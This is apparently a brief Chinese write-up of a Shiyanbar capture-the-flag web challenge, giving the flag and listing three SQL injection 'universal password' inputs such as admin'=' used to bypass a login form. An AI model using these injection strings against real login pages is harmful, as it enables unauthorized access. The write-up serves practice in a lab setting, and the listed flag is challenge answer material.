实验吧web之登陆一下好么
flag值:ctf{51d1bf8fb65a8c2406513ee8f52283e7}
解题步骤:
1、看题目提示,说是把所有语句都过滤了,那就不要往注入语句那个地方想了
![](https://img2018.cnblogs.com/blog/1785869/201909/1785869-20190912233521500-1079194171.jpg)
![](file:///D:/%25E6%259C%2589%25E9%2581%2593%25E4%25BA%2591%25E7%25AC%2594%25E8%25AE%25B0%25E8%25AE%25B0%25E5%25BD%2595%25E8%25B5%2584%25E6%2596%2599/qq47DA65658B77EF870612B0AF231434DC/ac5c7d6769644546974113b6fe63433f/e89b337b64f24a8aaa212a90f260db13.jpg)
2、检查网页源代码,没有啥问题,尝试用一下万能密码
一:username:1'='0 password:1'='0
二:username:what'=' password:what'='
三:username:admin'=' password:admin'='
![](https://img2018.cnblogs.com/blog/1785869/201909/1785869-20190912233539415-1634847872.jpg)
![](file:///D:/%25E6%259C%2589%25E9%2581%2593%25E4%25BA%2591%25E7%25AC%2594%25E8%25AE%25B0%25E8%25AE%25B0%25E5%25BD%2595%25E8%25B5%2584%25E6%2596%2599/qq47DA65658B77EF870612B0AF231434DC/0911bf3246ae46e4927385efb5ec7fc8/746ba5e5bb71468388eb0ba014744e25.jpg)
3、拿取flag值,可以通过mysql数据库拿取flag值,自己研究
![](file:///D:/%25E6%259C%2589%25E9%2581%2593%25E4%25BA%2591%25E7%25AC%2594%25E8%25AE%25B0%25E8%25AE%25B0%25E5%25BD%2595%25E8%25B5%2584%25E6%2596%2599/qq47DA65658B77EF870612B0AF231434DC/3b3563fe83294af4877149b46a853e60/c92522dd15694ec5b7b0118391fca483.jpg)
![](https://img2018.cnblogs.com/blog/1785869/201909/1785869-20190912233555761-402371714.jpg)